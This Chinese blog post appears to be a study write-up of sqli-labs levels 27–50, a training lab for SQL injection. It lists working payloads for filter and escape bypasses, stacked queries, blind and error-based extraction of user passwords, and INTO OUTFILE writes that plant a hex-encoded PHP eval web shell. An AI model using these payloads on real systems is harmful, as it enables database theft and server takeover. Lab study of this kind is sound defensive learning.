[sqli-labs] 学习2

less-27

  • 比上一关多加了union,select的过滤,只要大小写混杂就可以绕过
#判断正确
http://localhost/sqli-labs-7.2/Less-27/?id=1'=(left((seLect(group_concat(@@version))),1)='5')='1
#判断错误
http://localhost/sqli-labs-7.2/Less-27/?id=1'=(left((seLect(group_concat(@@version))),1)='a')='1

less-27a

  • 跟27关一样,改的只是闭合符
[sqli-labs] 学习2_第1张图片
  • 判断正确回显
  • 判断错误回显

less-28

  • 我感觉跟27关没什么大区别,仅仅是改了闭合符,而且好像还不单独过滤select了
http://localhost/sqli-labs-7.2/Less-28?id=1'=(left((seLect(group_concat(@@version))),1)='5')='1

less-28a

  • 过滤条件比上一关还少,只过滤了union select这种组合,把空格改成括号就行了,或者直接用28关的也行
http://localhost/sqli-labs-7.2/Less-28a?id=-1') union(select 1,2,group_concat(username) from users)  %23

less-29

  • 利用tomcat解析第一个参数,apache解析最后一个参数来进行注入
#爆用户
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,user(),3--+
#爆数据库名
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
#爆数据表名
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),3--+
#爆数据段名
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 'users'),3--+
#爆数据
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(username) from users),3--+

http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(password) from users),3--+

less-30

  • 跟29关一样,闭合符变成了"
[sqli-labs] 学习2_第2张图片
http://127.0.0.1:8001/sqli-labs/Less-30/index.jsp?id=1&id=-2"union select 1,(select group_concat(password) from users),3--+

less-31

  • 还是跟29关一样,闭合符变成了")
[sqli-labs] 学习2_第3张图片
http://127.0.0.1:8001/sqli-labs/Less-31/index.jsp?id=1&id=-2")union select 1,(select group_concat(password) from users),3--+

less-32

  • 前面的'利用宽字节绕过,后面的'用十六进制编码绕过
#爆用户名
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(user()),3--+
#爆数据库
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
#爆数据表名
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479),3--+
#爆数据段名
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273),3--+
#爆数据
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(username) from users),3--+

http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(password) from users),3--+

less-33

  • 跟32关一样...

less-34

  • 将 utf-8 转换为 utf-16 或 utf-32,例如将 ’ 转为 utf-16 为%ff%fe%27直接用万能密码绕过登陆
>>> '\''.encode('utf-16')
"\xff\xfe'\x00"

less-35

  • 跟33关差不多,但是没有闭合符号,所以不用考虑绕过addslashes函数
#爆数据库名
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(schema_name) , 3 from information_schema.schemata %23
#爆数据库表名
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(table_name) , 3 from information_schema.tables where table_schema = 0x7365637572697479 %23
#爆数据库段名
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(column_name) , 3 from information_schema.columns where table_name = 0x7573657273 %23
#爆数据
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(username) , 3 from users %23

http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(password) , 3 from users %23

less-36

  • 由于mysql没有设置编码为gbk而数据段name编码为gbk,所以可以利用前面%df%27或者utf-16,utf-32编码来绕过mysql_real_eacape_string函数
#爆数据库名
http://127.0.0.1/sqli-labs/Less-36?id=-1%df' union select 1,group_concat(schema_name),3 from information_schema.schemata %23

less-37

  • 跟34关一个思路,用万能密码登陆
uname=%ff%fe%27 or 1=1 %23 &passwd=dumb&submit=Submit
[sqli-labs] 学习2_第4张图片

less-38

  • 使用堆叠注入往表里成功插入数据
http://127.0.0.1/sqli-labs/Less-38?id=1';insert into users(id,username,password) values('17','aaa','bbb'); %23
[sqli-labs] 学习2_第5张图片

less-39

  • 相对38关而言,少了闭合符
http://127.0.0.1/sqli-labs/Less-39?id=1 ;insert into users(id,username,password) values('17','aaa','bbb'); %23

less-40

  • 相对39关,改了闭合符为')
http://127.0.0.1/sqli-labs/Less-40?id=1') ;insert into users(id,username,password) values('17','aaa','bbb'); %23

less-41

  • 跟39关的差别就是不报错,只能通过and 1=1and 1=2回显来判断是否注入成功
http://127.0.0.1/sqli-labs/Less-41?id=1 ;insert into users(id,username,password) values('17','aaa','bbb'); %23

less-42

login_user=a &login_password=c';create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login
  • 创建一个table
[sqli-labs] 学习2_第6张图片
  • 删除一个table
[sqli-labs] 学习2_第7张图片

less-43

  • 相较于42关换了闭合符
login_user=a &login_password=c') ;create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login

less-44

  • 跟42关一样,只不过是基于盲注的
[sqli-labs] 学习2_第8张图片

less-45

  • 跟44关一类型,闭合符变了而已
login_user=a &login_password=c') ;create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login

less-46

  • order by后面的注入,可以利用报错注入,延时注入

#由于版本问题,下面这种报错注入只能获取版本,不能获取更多的信息
http://127.0.0.1/sqli-labs/Less-46/?sort=1 and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x) %23

#报错注入
http://127.0.0.1/sqli-labs/Less-46?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))) %23
#延时注入
http://127.0.0.1/sqli-labs/Less-46?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23

http://127.0.0.1/sqli-labs/Less-46?sort= (select if(substring(current,1,1) = char(115) , benchmark(50000000,md5('1')),null) from (select database() as current ) as tb1 ) %23

#导出文件
http://127.0.0.1/sqli-labs/Less-46?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23

#写文件
http://127.0.0.1/sqli-labs/Less-46?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f706f73745b22313233225d293f3e %23

less-47

  • 跟46关比换了闭合符
#报错注入
http://127.0.0.1/sqli-labs/Less-47/?sort=1'  and  (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))) %23

#延时注入
http://127.0.0.1/sqli-labs/Less-47/?sort=1' and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23

#导出文件
http://127.0.0.1/sqli-labs/Less-47/?sort=1'  into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23

#写文件
http://127.0.0.1/sqli-labs/Less-47?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f706f73745b22313233225d293f3e %23

less-48

  • 跟46关比不报错,所以是盲注,用延时注入即可
#延时注入
http://127.0.0.1/sqli-labs/Less-48?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23

#或者用into outfile写文件
http://127.0.0.1/sqli-labs/Less-48?sort=1 into outfile "/Users/hacker-mao/Documents/MAMP/4.php" %23

#用lines terminated by写文件
http://127.0.0.1/sqli-labs/Less-48?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f706f73745b22313233225d293f3e %23

less-49

  • 跟47关相比不报错,也同样是盲注,用延时注入
#延时注入
http://127.0.0.1/sqli-labs/Less-49?sort=1' and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23

#用into outfile写文件
http://127.0.0.1/sqli-labs/Less-49?sort=1'  into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23

#用lines terminated by写文件
http://127.0.0.1/sqli-labs/Less-49?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020 %23

[sqli-labs] 学习2_第9张图片

less-50

  • 看着跟46关差不多,主要区别就是这关使用了mysqli_multi_query()函数
#延时注入
http://127.0.0.1/sqli-labs/Less-50/?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23

http://127.0.0.1/sqli-labs/Less-50?sort= (select if(substring(current,1,1) = char(115) , benchmark(50000000,md5('1')),null) from (select database() as current ) as tb1 ) %23

#用into outfile写文件
http://127.0.0.1/sqli-labs/Less-50?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23

#用lines terminated by写文件
http://127.0.0.1/sqli-labs/Less-50?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020 %23
[sqli-labs] 学习2_第10张图片
  • order by stacked injection!执行sql语句我们这里使用的是mysqli_multi_query()函数,而之前我们使用的是mysqli_query(),区别在于mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句,那么我们此处就可以执行多个sql语句进行注入,也就是我们之前提到的statcked injection
http://127.0.0.1/sqli-labs/Less-50?sort=1 ; create table test like users;
[sqli-labs] 学习2_第11张图片

你可能感兴趣的:([sqli-labs] 学习2)